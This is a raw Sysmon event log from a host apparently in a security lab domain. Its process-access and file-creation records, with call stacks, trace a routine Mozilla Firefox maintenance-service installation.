Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000016246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exeC:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe2021-01-18 13:59:53.177 10341000x800000000000000016245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\System32\windows.storage.dll+1e3eaa(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3e9c(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3e9c(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.161{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000016237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:53.161{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exeC:\Users\ADMINI~1\AppData\Local\Temp\nseD8BD.tmp\System.dll2021-01-18 13:59:53.161 10341000x800000000000000016236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
